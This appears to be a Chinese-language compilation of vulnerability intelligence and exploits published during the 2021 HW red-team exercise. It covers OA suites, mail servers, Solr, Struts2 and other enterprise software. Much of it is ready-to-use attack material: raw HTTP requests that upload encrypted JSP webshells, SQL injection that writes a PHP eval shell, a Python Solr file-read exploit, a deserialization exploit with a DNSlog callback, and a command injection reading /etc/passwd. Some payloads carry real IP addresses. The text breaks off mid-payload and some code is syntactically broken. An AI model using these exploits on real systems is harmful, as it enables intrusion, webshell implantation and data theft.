2021HW期间公布的部分漏洞及利用方式

开始之前的

志远OA任意用户登录

2021HW期间公布的部分漏洞及利用方式

4月8号安全情报

4月8日15时,最新传出WPS-0day利用方式,通过点击触发WPS内置浏览器RCE
4月8日12时,有消息传出齐治堡垒机存在命令执行漏洞,poc疑似已流出
4月8日12时,网传深信服EDR存在命令执行漏洞,poc疑似已流出
4月8日12时,网传深信服VPN存在无条件RCE漏洞,poc疑似已流出
4月8日12时,网传jackson存在反序列化漏洞,poc疑似已流出
4月8日12时,网传CoreMai存在命令执行漏洞, poc疑似已流出
4月8日12时,网传用友NC6.5版本存在反序列化命令执行漏洞,poc疑似已流出
4月8日12时,网传dubbo存在反序列化命令执行漏洞,poc疑似已流出
4月8日12时,网传weblogic存在反序列化命令执行漏洞,poc疑似已流出
4月8日11时,网传和信创天云桌面系统全版本存在命令执行,文件上传,poc已流出
4月8日11时,网传红帆0A任意文件写入漏洞,poc疑似已流出
4月8日11时,网传exchange、 致远、shiro 存在0day漏洞,利用方式疑似已流出
4月8日11时,网传金蝶K3Cloud全版本存在命令执行,poc疑似已流出
4月8日11时,网传用友U8Cloud版本存在命令执行,poc疑似已流出
4月8日11时,网传h3c计算管理平台2016年版存在任意账户添加,poc疑似已流出
4月8日11时,网传启明星辰天清汉马USG防火墙存在逻辑缺陷,poc疑似已流出
4月8日10时,有消息传出天眼存在0day漏洞,poc已流出

dzzoffice 前台RCE

项目地址

https://github.com/zyx0814/dzzoffice/releases/

漏洞前提

首先需要获取到authkey 这个可以通过爆破或者其他的方式获取到具体的这个请看文章

我现在的环境的key为:3090dfHwzmw9lsC3

加密脚本

<?php 
function authcode_config($string,$key, $operation = 'DECODE', $expiry = 0)
{
$ckey_length = 4;
$key = md5($key);
$keya = md5(substr($key, 0, 16));
$keyb = md5(substr($key, 16, 16));
$keyc = $ckey_length ? ($operation == 'DECODE' ? substr($string, 0, $ckey_length): substr(md5(microtime()), -$ckey_length)) : '';

$cryptkey = $keya.md5($keya.$keyc);
$key_length = strlen($cryptkey);

$string = $operation == 'DECODE' ? base64_decode(substr($string, $ckey_length)) : sprintf('%010d', $expiry ? $expiry + time() : 0).substr(md5($string.$keyb), 0, 16).$string;
$string_length = strlen($string);

$result = '';
$box = range(0, 255);

$rndkey = array();
for($i = 0; $i <= 255; $i++) {
$rndkey[$i] = ord($cryptkey[$i % $key_length]);
}

for($j = $i = 0; $i < 256; $i++) {
$j = ($j + $box[$i] + $rndkey[$i]) % 256;
$tmp = $box[$i];
$box[$i] = $box[$j];
$box[$j] = $tmp;
}

for($a = $j = $i = 0; $i < $string_length; $i++) {
$a = ($a + 1) % 256;
$j = ($j + $box[$a]) % 256;
$tmp = $box[$a];
$box[$a] = $box[$j];
$box[$j] = $tmp;
$result .= chr(ord($string[$i]) ^ ($box[($box[$a] + $box[$j]) % 256]));
}

if($operation == 'DECODE') {
if((substr($result, 0, 10) == 0 || substr($result, 0, 10) - time() > 0) && substr($result, 10, 16) == substr(md5(substr($result, 26).$keyb), 0, 16)) {
return substr($result, 26);
} else {
return '';
}
} else {
return $keyc.str_replace('=', '', base64_encode($result));
}
}

echo base64_encode(authcode_config("disk::..././..././..././shell.php",md5('3090dfHwzmw9lsC3'),'ENCODE'));

输出的加密结果

2021HW期间公布的部分漏洞及利用方式

构造数据包:

POST /core/api/wopi/index.php?access_token=1&action=contents&path=ZmM0OWp3bDgxbDE3WlhocFlCVUl4ZDFvRkNYeDRVaGtQbklJYlVSUjV2VjRzLzBwUkJ0Y051ZHl4QzVITFlvN205cENqZktDY1lyNHRQQ0pWblU= HTTP/1.1
Host: word.com
Content-Length: 18
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://word.com
Referer: http://word.com/user.php?mod=login
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Connection: close

<?php phpinfo();?>

4月9号安全情报

JellyFin任意文件读取

GET /Audio/anything/hls/..\data\jellyfin.db/stream.mp3/ HTTP/1.1 
GET /Videos/anything/hls/m/..\data\jellyfin.db HTTP/1.1 
GET 
/Videos/anything/hls/..\data\jellyfin.db/stream.m3u8/?api_key=4c5750626da14b0a804977b09b 
f3d8f7 HTTP/1.1 

帆软 V9getshell【历史漏洞】

FineReport V9

注意: 这个漏洞是任意文件覆盖,上传 JSP 马,需要找已存在的 jsp 文件进行覆盖 Tomcat

启动帆软后默认存在的 JSP 文件:

比如:/tomcat-7.0.96/webapps/ROOT/index.jsp

覆盖 Tomcat 自带 ROOT 目录下的 index.jsp:

POST /WebReport/ReportServer? 
op=svginit&cmd=design_save_svg&filePath=chartmapsvg/../../../../WebReport/update .jsp HTTP/1.1 
Host: 192.168.169.138:8080 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) 
Chrome/81.0.4044.92 Safari/537.36 
Connection: close 
Accept-Au: 0c42b2f264071be0507acea1876c74 
Content-Type: text/xml;charset=UTF-8 
Content-Length: 675 

{"__CONTENT__":"<%@page import=\"java.util.*,javax.crypto.*,javax.crypto.spec.*\"%><%!class U extends 
ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return 
super.defineClass(b,0,b.length);}}%><%if(request.getParameter(\"pass\")!=null) {String 
k=(\"\"+UUID.randomUUID()).replace(\"- 
\",\"\").substring(16);session.putValue(\"u\",k);out.print(k);return;}Cipher 
c=Cipher.getInstance(\"AES\");c.init(2,new 
SecretKeySpec((session.getValue(\"u\")+\"\").getBytes(),\"AES\"));new 
U(this.getClass().getClassLoader()).g(c.doFinal(new 
sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInsta 
nce().equals(pageContext);%>","__CHARSET__":"UTF-8"}

泛微 OA 8 前台SQL注入

POC

http://106.15.190.147/js/hrm/getdata.jsp?cmd=getSelectAllId&sql=***注入点

使用Payload查询数据库中sysadmin的密码

Select password as id from HrmResourceManager 
http://106.15.190.147/js/hrm/getdata.jsp?cmd=getSelectAllId&sql=select%20password%20as%2 
0id%20from%20HrmResourceManager 

2021HW期间公布的部分漏洞及利用方式

2021HW期间公布的部分漏洞及利用方式

泛微 OA 9前台无限制getshell

漏洞位置:

/page/exportImport/uploadOperation.jsp

2021HW期间公布的部分漏洞及利用方式

文件上传位置:

view-source:http://112.91.144.90:5006/page/exportImport/fileTransfer/1.jsp

2021HW期间公布的部分漏洞及利用方式

wiki POC 链接https://github.com/PeiQi0/PeiQi-WIKI-POC/commit/f5fb98b0cc2c9dcc9b8adce41479cf836265419a

POST /page/exportImport/uploadOperation.jsp HTTP/1.1
Host: xxx.xxx.xxx.xxx
Content-Length: 397
Pragma: no-cache
Cache-Control: no-cache
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36 Edg/89.0.774.68
Origin: null
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary6XgyjB6SeCArD3Hc
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9,en;q=0.8,en-GB;q=0.7,en-US;q=0.6
dnt: 1
x-forwarded-for: 127.0.0.1
Connection: close
------WebKitFormBoundary6XgyjB6SeCArD3Hc
Content-Disposition: form-data; name="file"; filename="peiqi.jsp"
Content-Type: application/octet-stream
<%@page import="java.util.*,javax.crypto.*,javax.crypto.spec.*"%><%!class U extends ClassLoader{U(ClassLoader c){super(c);}public Class g(byte []b){return super.defineClass(b,0,b.length);}}%><%if (request.getMethod().equals("POST")){String k="e45e329feb5d925b";session.putValue("u",k);Cipher c=Cipher.getInstance("AES");c.init(2,new SecretKeySpec(k.getBytes(),"AES"));new U(this.getClass().getClassLoader()).g(c.doFinal(new sun.misc.BASE64Decoder().decodeBuffer(request.getReader().readLine()))).newInstance().equals(pageContext);}%>
------WebKitFormBoundary6XgyjB6SeCArD3Hc--
​```

地址: /page/exportImport/fileTransfer/peiqi.jsp

默认密码 rebeyond

和信创天远程桌面命令执行

POST /Upload/upload_file.php?l=1 HTTP/1.1 
Host: x.x.x.x 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) 
Chrome/87.0.4280.141 Safari/537.36 
Accept: image/avif,image/webp,image/apng,image/*,*/*;q=0.8 
Referer: x.x.x.x 
Accept-Encoding: gzip, deflate 
Accept-Language: zh-CN,zh;q=0.9,fil;q=0.8 
Cookie: think_language=zh-cn; PHPSESSID_NAMED=h9j8utbmv82cb1dcdlav1cgdf6 
Connection: close 
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryfcKRltGv 
Content-Length: 164

------WebKitFormBoundaryfcKRltGv 
Content-Disposition: form-data; name="file"; filename="1.png" 
Content-Type: image/avif 
1
------WebKitFormBoundaryfcKRltGv--

2021HW期间公布的部分漏洞及利用方式

默安蜜罐管理平台未授权问【官方辟谣】

漏洞信息

幻阵是默安科技首创的一款基于攻击混淆与欺骗防御技术的威胁检测防御系统,由于蜜罐管理平台鉴权不完善,可导致攻击者在未授权的情况下访问管理页面。默安官方发表通告并表示幻阵管理平台存在于内网网址,攻击者难以进行访问,且尽管可以访问也只能让幻阵执行ping指令,不会造成任何安全隐患。

漏洞危害

由于蜜罐管理平台鉴权不完善,可导致攻击者在未授权的情况下访问管理页面。

官方辟谣

默安科技关注到业内有人散布“默安科技幻阵管理后台存在认证绕过漏洞”的不实消息,特此作出如下说明。

2021HW期间公布的部分漏洞及利用方式

天擎越权访问【官方辟谣】

POC

GET /api/dbstat/gettablessize HTTP/1.1 

官方:近期,HW期间泄露情报,在Web登录界面且未登录的情况下会显示提示信息,并且会涉及用户组织,功能模块授权过期时间等。天擎官方发表声明并表示Web接口为正常接口,不存在漏洞。

天擎前台SQL注入漏洞【历史漏洞】

PoC

https://<IP>/api/dp/rptsvcsyncpoint?ccid=1';create table O(T TEXT);insert into O(T) values('<?php @eval($_POST[1]);?>');copy O(T) to '<目标文件写入路径>';drop table O;--

利用方式

将首先创建新的数据库表,后将数据库内容更名为webshell的目标名,最后删除表清理痕迹。

官方辟谣

该漏洞为内部已知问题,并且在2020年护网前的版本已经修复。

天融信数据防泄漏系统(LDP)越权修改管理员密码【历史漏洞】

漏洞信息:

天融信数据防泄漏系统越权修改管理员密码,该漏洞为2020年8月17号收到历史情报,非近期HW期间漏洞。

POC

默认用户superman的uid=1
POST  /?module-auth_user&action=mod_edit.pwd HTTP/1.1

2021HW期间公布的部分漏洞及利用方式

蓝凌OA任意写入漏洞

POC

/sys/search/sys_search_main/sysSearchMain.do?method=editParam&fdParemNames=11&FdParameters=[shellcode]

禅道11.6 SQL注入【历史漏洞】

漏洞信息

11.6版本存在SQL注入漏洞,该漏洞为Nday ,非HW期间0DAY

漏洞验证

注入来源于禅道采用的pathinfo,在以下URL中

http://xxx.xxx/zentaopms_11.6/www/api-getModel-api-sql-sql=select+account,password+from+zt_user

对路径的解析为

getModel-<Model名字>-<Method名字>-<参数名字>=<参数的值>

Solr 任意文件读取漏洞【历史漏洞】

漏洞信息

该漏洞是由于Apache Solr在默认安装时不会开启身份验证,攻击者在未授权情况下访问Config API打开requestDispatcher.requestParsers.enableRemoteStreaming开关,进而通过构造恶意请求,执行SSRF攻击,读取目标服务器的任意文件。

影响范围

Apache Solr <= 8.8.1

POC

http://ip//solr/db/debug/dump?param=ContentStreams&stream.url=file:///etc/passwd  (db为存在的应用名) 
# solr任意文件下载漏洞poc
# __coding=utf-8__
import requests
import json
import argparse

TIMEOUT = 20


def run(target: str, action: str):
    try:
        admin_url = target + "/solr/admin/cores?indexInfo=false&wt=json"
        response = requests.get(admin_url, verify=False, timeout=TIMEOUT)
        if response.status_code == 200 or "name" in response.text:
            data = json.loads(response.content)
            for i in data["status"]:
                key = data["status"][i]["name"]
                return attack(key, target, action)
    except Exception as e:
        error = "[-] {} run error:{}".format(target, str(e))
        raise RuntimeError(error)
    return None


def attack(core_name: str, target: str, action: str):
    session = requests.session()
    config_url = target + "/solr/" + core_name + "/config"
    json_data = {"set-property": {"requestDispatcher.requestParsers.enableRemoteStreaming": "true"}}
    response = session.post(config_url, data=json.dumps(json_data), timeout=TIMEOUT)
    if response and 200 != response.status_code: return None

    dump_url = target + "/solr/" + core_name + "/debug/dump?param=ContentStreams"
    dump_data = {"stream.url": action}
    response = session.post(dump_url, data=dump_data, timeout=TIMEOUT)
    if response is None:
        return None
    elif 200 == response.status_code:
        content = json.loads(response.text)
        return content['streams'][0]['stream']
    elif 500 == response.status_code:
        return response.text
    else:
        return None


if __name__ == '__main__':
    parser = argparse.ArgumentParser(description='Solr 任意文件下载漏洞POC.')
    parser.add_argument('-u',"--url",
                        help='solr attack target', required=True)
    parser.add_argument('-a', '--action',
                        help='file or url', required=True)
    args = parser.parse_args()
    print("[+] check {} ,action:get {}".format(args.url, args.action))
    result = run(args.url, args.action)
    if result is None: print("[-] Not found vuln")
    print("[+] The result is as follows:\n{}".format(result))

参考链接

https://github.com/keven1z/SolrfilereadPOC

致远OA ajax.do 文件上传漏洞【历史漏洞】

漏洞信息

由于致远OA旧版本某些接口存在权限绕过漏洞,攻击者通过特制的HTTP请求将导致接口的权限机制被绕过,并结合某些接口功能实现在未授权情况下上传恶意文件,从而控制目标主机,经验证,该漏洞为2020年12月29日,致远官网发布的2020年10-12月安全通告中历史漏洞。

影响范围

致远OA V8.0
致远OA V7.1、V7.1SP1
致远OA V7.0、V7.0SP1、V7.0SP2、V7.0SP3
致远OA V6.0、V6.1SP1、V6.1SP2
致远OA V5.x

POC

POST /seeyon/autoinstall.do.css/..;/ajax.do?method=ajaxAction&managerName=formulaManager&requestCompress=gzip HTTP/1.1
Host: 127.0.0.1
Connection: close
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
User-Agent: Opera/9.80 (Macintosh; Intel Mac OS X 10.6.8; U; fr) Presto/2.9.168 Version/11.52
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: none
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
loginPageURL=; login_locale=zh_CN;
Content-Type: application/x-www-form-urlencoded

managerMethod=validate&arguments=%1F%C2%8B%08%00%00%00%00%00%00%00uTY%C2%93%C2%A2H%10%7E%C3%9E%C3%BD%15%C2%84%2F%C3%9A%C3%9136%C2%82%C2%8C%C3%ADN%C3%ACC%7B%21%C2%A2%C2%A8%C2%A0%5C%1B%C3%BB%00U%C3%88a%15%C2%B0rH%C3%991%C3%BF%7D%0B%C2%B0%C2%A7%7Bb%7B%C3%AB%C2%A52%C2%B32%C2%BF%C3%8A%C3%BB%C2%AF%C3%97%C3%AE%29%C2%B9%C3%A0%029%07%C2%92z%C3%9D%3F%C2%98%C3%81%17%C3%A6M%C2%A28%C2%B8%C2%96ts%2F%C3%8B%C2%BB%C3%AF%C3%A2y%C2%95%5E%C2%BC%2C%0B%C2%93%C2%B8%7E%C3%94%C3%B2K%18%C3%BBL%C3%AA%C3%A4%01%C3%B3%27%C3%93%C3%A9%C3%B7%C2%9F%C2%AE%C2%9E%C3%AB%C2%A4i%C3%B6%C2%94y%1EI%C3%A2%C2%A7%C3%8E%C3%B7%C3%9F%C2%99%C3%B6%C3%BC%169%C2%A5%C3%93%0F%C2%93%C3%BE%C2%8E%C2%9A%C3%A4%C3%86%25%C3%8C%C2%BD%0B%C2%93%C2%BE%C3%93%1C%05%C2%88%C2%BD%2B%C3%B3%C2%89Z%C2%AF%C3%86%7F%C3%AC%60%0C%C3%BBQ%C2%96V%C2%9D%C2%87%C2%9F%C2%A0%C3%8C%C3%9D%C2%81%2C%C3%B0%10%C2%AA%3D%C3%98%C2%89%C3%A9%0D%C3%8CR%C3%A2rcVZ%06%C2%B9%2B%0A%C2%B7-%C2%AEel%C3%A8%2CU%16%C3%8C%C2%92r%C3%8D%C2%A5%01%C3%84%C3%B3%02%C3%B0z%C2%B1%C3%86J%C3%A9jc%C3%B98x%29%C2%8F%C3%A2%22%C2%B65%C3%89%C2%87X%27%C2%80C%C2%A5%1B%C2%B1%C3%A1F%1B%12%29%1A%3E%3B%C2%B1r%C3%9Db5%05X%C2%8F%C2%A0%C2%888%5B%13%C2%AE%C2%96%01%C2%91%24%C2%A2%1C%C2%88c%02k%7C%C2%BC%C3%A0%2CM%18%C3%90%C3%B7l%1D%26Y%C3%83%C2%9B%7Ea%C3%B1%2B%01%2C%C3%95%C3%B2S%19%C3%85%C2%B5%C2%8DM%21%C2%87R%C2%B9%C2%8B%C2%AA%7F%00%C3%BF%C3%B2%C3%8D%16%C3%B5%C3%88%15%17%C3%842%C3%95%C3%94%C3%A5%C2%86%C2%8F%C2%92%C2%A8d%C2%96%C2%A9%C3%9C%C2%A4%C3%85%C3%91%C2%B7%C3%8D%C2%80%C2%B5%0D%C3%A1%0C%C3%88dFun%C2%80%C2%ADJ%C3%8BP%11%C2%88s%5D%C2%9E%C2%B7z%07q%1CP%0C%22%C2%89%C2%9B%C3%94%C3%A3%C2%95%01%C2%A0%C2%B4L%C3%A9-%3F%C2%B8Bc%C2%959%C3%86%C3%86%C3%9FsU%00%C3%B8%C2%8Do%C2%93+%C3%B4L%15I%C2%8B%1CZ%21%1A%C3%91%C3%B8Xh%C2%AE%0Ai%C3%99%C3%9A%C2%AD%C2%B1%C2%8Al%C2%8C%0A%C3%BB%C3%98b%C3%8B%C2%A2%C2%94m%C2%A6U%C2%B8%C3%86%15r1d%C2%9D%C3%A9yt2%C3%99g%C2%9A%C3%93%3A%C3%AFg%C3%9B%C2%A8%C3%B5V%01%C3%8D%01%C3%8D%C3%9F%3Do%C2%B1%12%01%C2%8C%C2%AEP%C2%AC%10%C2%9C%09%07%C2%B8%5C%C2%A5.%06%C2%BEscC%C3%BB%C2%B0%1F%C3%98%C2%87%0D%C3%99%1A6%C2%B2%22%C3%BD%C2%BC%3DH%03%2B%C2%94F%C2%80%C3%93oM%0DB%C3%A1%0AM%C3%95%C2%B0%C2%8Cj%60k%7E%085%29s%C3%88y%C2%B4%C3%A7%C3%90%C3%95ic%1C%C2%BF%C3%91k%0C%11%C2%9C%23ZW5p%C2%B1%C2%82%C3%A4%C3%A9j%C2%A2%C3%AA%C2%9BP%3E%C3%A4%C3%91%C2%9A%C3%86%C3%A0%C2%98%C3%BBd%13V%C2%85m%02%C3%BF%C3%88%C3%A9Q%1D%C2%AB%C3%86%C3%A9%C3%82%C2%91%C2%9F+%C2%8B%C3%B8%C3%89%C2%87%3Fc%C3%BB%C3%97%3FS%C2%99H%C2%A1%C2%AC5%C3%B2i%C2%9D%2F%40%C3%BCt%C3%BD%C2%86%C2%AF%C2%9DG.%C3%96yZ%C2%9F%04%C2%8AA%0AH%C2%A3%C3%97%C3%96%C2%A7%C3%96k%C3%BC%C3%BA%C2%B56%C3%B2%C3%B4L%C3%A5+%C2%B1%C2%88pvY%C2%9B%C3%A6c%C2%91%C3%89%C2%A2%C2%80+%C2%99%C3%9C%C2%A01%2C%5C%03%C3%9D%C3%A8%C3%9Bt%C2%AF%2B%0B%25R%C3%A74%C2%AF%C3%A5%C3%9D%C2%AEh%C3%BA%C2%83S%C3%91%3E%C3%96%C2%B1M%7BU%5E%C2%AE%100u%04%C3%B8%7Das%3A%7B%C3%84%C3%BA%C3%9B%1F%05%C2%A8i%3A%C2%B3.%3E%26%C3%94%C3%8F%C2%94%C3%86%40%C3%A3%C2%87%2B7VX%C3%8B%10%22%1A%1F%C3%B5C%C2%AF%C2%A0%C2%B1%C3%88%00%09%C2%9A%C2%9E%C3%9Es%C3%A3%02%C2%8A%C3%BA%10%C3%92%C3%9A%C3%AE%C2%A6%C3%A3%C2%A6%27%01%C2%A7%10%C3%87%C2%9C%C2%B0%C2%AE%C2%A8%C2%B3%C2%BB%C3%A8Z%C2%B6u%5D%C2%95.%C2%BF%7F%7C%C2%9Fq%26%2B%C3%A2%3E%0E3%C3%90%C2%9F%C2%BCh%C3%B3o%C3%83%C2%99%07%12H%C3%87%1C%C3%9E%C3%AFv%C3%82%3FW%C3%AA%C3%BDw%C2%AA%5B%C2%B3%3B%C3%93%C3%9A%C2%B6L%C3%AF%0E%C3%98o%C3%AFIq%3AQ%C2%80f%09%3C%7C%C3%A9%1C%0F%C2%8B%C2%AF%C3%8F%1F%C2%97%C3%84%C3%87-%C3%93o%18%14%C3%B7%3E%C2%82%C3%BF%C2%9F.%40I%C3%A6Q%C3%87%7E%7C%C2%AF%C2%B7+%25%C2%A0wb%C2%B2%C3%9C%C3%89C%C3%80TU%C3%95%7Bx%C3%AD%C3%BE%C2%A0%C2%AB%C2%91%C2%AE%C3%87%C3%97%C3%BA%C3%8E%2F%C2%85%C3%97%C3%BD%C3%BB_%2F%07M%C2%ADU%05%00%00

冰蝎3默认japx马pass:rebeyond

webshell地址:http://xxx.xxx.xxx.xxx/seeyon/mmd.jspx

成功返回

HTTP/1.1 500

{
"message":null,
"code":"0614448583",
"details":null
}

亿邮电子邮件系统远程命令执行

参考链接 https://github.com/Tas9er/EYouMailRCE

tools EYouMailRCE-master.zip

POC

POST /webadm/?q=moni_detail.do&action=gragh HTTP/1.1
Host: 192.168.10.1
Content-Length: 25
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36
Content-Type: application/x-www-form-urlencoded;charset=UTF-8
Origin: chrome-extension://ieoejemkppmjcdfbnfphhpbfmallhfnc
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: EMPHPSID=ffah74s753ae239996a1mmbld0; empos=0
Connection: close

type='|cat /etc/passwd||'

其他漏洞信息

1、MYBB SQL 注入漏洞(CNVD-2021-25709)【可信度 100%】
	MyBB 是᳿款免费的开源论坛软件。MyBB 1.8.26 之前版本的主题属性存在 SQL 注入漏洞。
3、用友 NC 1DAY 反序列化【可信度 100%】 
	用友 NC 面向集团企业的世界级高端管理软件,发现存在任意文件上传漏洞,利用 apache commonscollections库可执行反序列化。
4、钓鱼邮件【可信度 100%】 
	来源网络情报,发现钓鱼邮件内含有恶意 execl 文件,文件点击可造成远程控制等威胁,微步在线已验 证。 
        1)封禁 IP192.31.96.152;
        2)注意恶意邮件后缀@rainmetal.cn,不要点击此类邮件后缀发送的邮件。
5、和信创天云桌面命令执行漏洞任意文件上传【可信度 60%】 
	和信下᳿代云桌面系统(VENGD),是国内领先的基于 NGD架构的桌面虚拟化 产品,它融合了 VDI、VOI、IDV 三大架构优势,实现了前后端混合计算,在调度服务器后端计算资源的 同时更能充分利用前端资源,和信下᳿代云桌面不仅可以满足随时随地移动办公的需求,更可以在窄带环 境下实现 3D 高清播放和外设硬件的全面兼容,满足大规模终端的管理、安全、运维需求。疑似和信创天 云桌面存在任意文件上传漏洞。
7、DZZOFFICE 最新版 RCE【可信度 100%】
    DzzOffice是一款开源的云存储与应用管理工具,主要可用于企业管理阿里云、亚马逊等云存储等空间, 把空间可视化分配给成员使用。发现最新版存在 RCE,经验证参数 bz 存在 SQL 注入漏洞。
8、深信服和致远 OA 文件上传漏洞情报【可信度 60%】 
    该情报属于网络情报暂无相关细节进行验证。
9、F5 BIG-IP 16.0.X-ICONTROL REST 远程代码执行【可信度 100%】 
	F5 BIG-IP 是美国 F5 公司的᳿款集成了网络流量管理、应用程序安全管理、负载均衡等功能的应用交付平 台。F5 BIG-IP 存在安全漏洞,该漏洞允许未经身份验证的攻击者通过 BIG-IP 管理界面和自身 IP 地址对iContronl REST 接口进行网络访问,以执行任意系统命令,创建或删除文件以及禁用服务。
10、多款 HUAWEI 产品内存泄露漏洞【可信度 100%】 
	Huawei  IPS Moudule 等都是中国华为(Huawei)公司的产品。Huawei IPS Moudule 是一款入侵防御系统 (IPS)模块。NGFW Moudule 是一款下一代防火墙(NGFW)模块。Secospace USG6600 是᳿款下一代防 火墙产品。多款 Huawei产品存在内存泄露漏洞。由于产品在某些场景下对内存释放处理不当,远程攻击 者可能会发送特定报文来触发该漏洞。成功利用该漏洞可能导致服务异常。
11、通达 OA V11,7 在线任意用户登录【可信度 100%】 
	通达 OA V11.7 版本存在这任意用户登录漏洞,该漏洞需要管理员在线才可以登录系统,另外᳿个方面就 是编译在线的 瀈濼濷 值进行判断。
12、CVE-2021-21975:VREALIZE OPERATIONS MANAGER SSRF【可信度 100%】 
	2021 年 3 月 31 日,VMWare 官方发布了 VMSA-2021-0004 的风险通告,漏洞编号为 CVE-2021-21975, CVE-2021-21983,漏洞等级:高危,漏洞评分 8.6。CVE-2021-21975:通过网络访问vRealize Operations Manager  API 的恶意攻击者可以执行服务器端请求伪造攻击,以窃取管理凭据。

4月10号安全情报

用友NC 反序列化利用

漏洞关注点

/service/~xbrl/XbrlPersistenceServlet

EXP

import requests
import threadpool
import urllib3import sys
import base64
ip = ""
dnslog = "\x79\x37\x64\x70\" #dnslog把字符串转16进制替换该段,测试用的ceye.io可以回显
data = "\xac\xed\x00\x05\x73\x72\x00\x11\x6a\x61\x76\x61\x2e\x75\x74\x69\x6c\x2e\x48\x61\x73\x68\x4d\x61\x70\x05\x07\xda\xc1\xc3\x16\x60\xd1\x03\x00\x02\x46\x00\x0a\x6c\x6f\x61\x64\x46\x61\x63\x74\x6f\x72\x49\x00\x09\x74\x68\x72\x65\x73\x68\x6f\x6c\x64\x78\x70\x3f\x40\x00\x00\x00\x00\x00\x0c\x77\x08\x00\x00\x00\x10\x00\x00\x00\x01\x73\x72\x00\x0c\x6a\x61\x76\x61\x2e\x6e\x65\x74\x2e\x55\x52\x4c\x96\x25\x37\x36\x1a\xfc\xe4\x72\x03\x00\x07\x49\x00\x08\x68\x61\x73\x68\x43\x6f\x64\x65\x49\x00\x04\x70\x6f\x72\x74\x4c\x00\x09\x61\x75\x74\x68\x6f\x72\x69\x74\x79\x74\x00\x12\x4c\x6a\x61\x76\x61\x2f\x6c\x61\x6e\x67\x2f\x53\x74\x72\x69\x6e\x67\x3b\x4c\x00\x04\x66\x69\x6c\x65\x71\x00\x7e\x00\x03\x4c\x00\x04\x68\x6f\x73\x74\x71\x00\x7e\x00\x03\x4c\x00\x08\x70\x72\x6f\x74\x6f\x63\x6f\x6c\x71\x00\x7e\x00\x03\x4c\x00\x03\x72\x65\x66\x71\x00\x7e\x00\x03\x78\x70\xff\xff\xff\xff\x00\x00\x00\x50\x74\x00\x11"+dnslog+"\x3a\x38\x30\x74\x00\x00\x74\x00\x0e"+dnslog+"\x74\x00\x04\x68\x74\x74\x70\x70\x78\x74\x00\x18\x68\x74\x74\x70\x3a\x2f\x2f"+dnslog+"\x3a\x38\x30\x78"
uploadHeader={"User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36"}
req = requests.post("http://+"ip"+/service/~xbrl/XbrlPersistenceServlet", headers=uploadHeader, verify=False, data=data, timeout=25)
print (req.text)

用友NC协同管理软件存在目录遍历漏洞

漏洞关注点

/NCFindWeb?service=IPreAlertConfigService&filename=

金山终端安全系统 V8存在默认口令

默认口令

admin/admin

金山终端安全系统 V8/V9存在文件上传漏洞

漏洞关注点

dzz/shares/index.php

齐治堡垒机某版本任意用户登录

漏洞关注点

/audit/gui_detail_view.php

POC

/audit/gui_detail_view.php?token=1&id=%5C&uid=%2Cchr(97))%20or%201:%20print%20chr(121)%2bchr(101)%2bchr(115)%0d%0a%23&login=shterm

致远OA远程代码执行漏洞

漏洞细节

未公开

Coremail 邮件系统任意文件上传漏洞【历史漏洞】

漏洞危害:

其特定版本范围内存在任意文件上传漏洞,攻击者可以上传webshell,从而造成远程代码执行。

影响范围

Coremail <= XT5.x

漏洞复现:

使用网上流传POC 进行验证 https://github.com/xiaoshu-bit/CoreMailUploadRce

pip3 install -r requirements.txt
python3 coremail_upload.py -u http://127.0.0.1:1111

文件上传poc:

POST /webinst/action.jsp HTTP/1.1
Host: 120.136.129.10
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/32.0.1700.76 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Content-Length: 99
Connection: close

func=checkserver&webServerName=127.0.0.1:6132/%0d@/home/coremail/web/webapp/justtest.jsp%20JUSTTEST

上传文位置: http://ip:port/coremail/justtest.jsp

Apache Struts2补丁绕过0day(实际为S2-052)

影响版本

2.1.1到2.3.x之前的2.3.x和2.5.13之前的2.5.x

漏洞关注点:

com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource

原exp

<map>
  <entry>
    <jdk.nashorn.internal.objects.NativeString>
      <flags>0</flags>
      <value class="com.sun.xml.internal.bind.v2.runtime.unmarshaller.Base64Data">
        <dataHandler>
          <dataSource class="com.sun.xml.internal.ws.encoding.xml.XMLMessage$XmlDataSource">
            <is class="javax.crypto.CipherInputStream">
              <cipher class="javax.crypto.NullCipher">
                <initialized>false</initialized>
                <opmode>0</opmode>
                <serviceIterator class="javax.imageio.spi.FilterIterator">
                  <iter class="javax.imageio.spi.FilterIterator">
